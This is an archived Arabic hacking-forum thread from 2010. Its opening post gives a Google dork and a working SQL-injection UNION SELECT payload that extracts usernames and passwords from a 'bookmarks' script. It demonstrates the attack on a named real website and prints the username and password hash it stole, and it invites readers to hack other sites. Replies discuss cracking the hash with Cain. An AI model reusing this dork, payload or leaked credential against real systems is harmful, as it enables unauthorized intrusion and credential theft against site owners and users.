:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   تغرة سهلـــة ادخــل و اخترق علـى رحتـكــ (http://www.vbspiders.com/vb/showthread.php?t=35664)

Mr-MoncéFiix 08-26-2010 08:27 AM
تغرة سهلـــة ادخــل و اخترق علـى رحتـكــ
 
السلام عليكم

أقدم لكم ثغرة راائـعـة و سهـلـة جداا في سكريبت bookmarks
الـثغرة لقيتهـا في منتدى عربي و قلت انقلهـا لكـم

اولا و لابـد منــه الـدوركـ :lalala:

inurl:bookmarks/view_group.php?id

الــثـغرة

+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8+from+apb_users--

كـالعـادة فأر التجاريــب

http://www.tegus.de/bookmarks/view_group.php?id=19


هذا الموقع راح نجرب عليه

ضيف رله رابط الاستغلال هدا
+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8+from+apb_users--
ليصبح

http://www.tegus.de/bookmarks/view_g...om+apb_users--


ملحووظــة
لا تنسى علامـة - قبل 1

?id=-1

راح يفتح لك الموقع عادي وتجد اليوزر والباس أمامك

achim:274x0QoO8Dj92

اليوزر achim

الباس 274x0QoO8Dj92

عندي لكم مواقع جاهزة للاختراق

لكـن مشفر :a32:smilies4

فكـ الهاش على رحتـــكـــ :a26:


انتظر ردووودكــم

MadaRaXP 08-26-2010 06:14 PM
ما نوع التشفير /// ؟؟

Mr-MoncéFiix 08-28-2010 12:42 AM
Upppppppp

Mr-MoncéFiix 09-10-2010 08:53 AM
Upp

Tn-Sn!PeR 09-10-2010 09:11 AM
ما نوع التشفير؟

KaLa$nikoV 09-10-2010 05:04 PM
بارك الله فيك

ViRuS Qalaa 09-10-2010 05:26 PM
[align=center]شكرا لك على الثغرة
وطبعا التشفيراخواني من نوع DES UNIX
وهو صعب الحقيقة لم اتعمل معاة من قبل ومااعتقد موقع بفك نوع من هذا التشفير بس افضل شيء نزلوا برنامج cain
ممكن يفك هذا النوع من التشفير ..)[/align]

Master vbspiders 09-10-2010 07:18 PM
[align=center]مممم الثغرة للحقن
ننقلها لقسم الحقن
مشكور بارك الله فيك ع الثغرة
تحياتي[/align]

EgyNono 09-11-2010 05:11 AM
مشخوووووووووووووووووووور


الساعة الآن 09:14 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0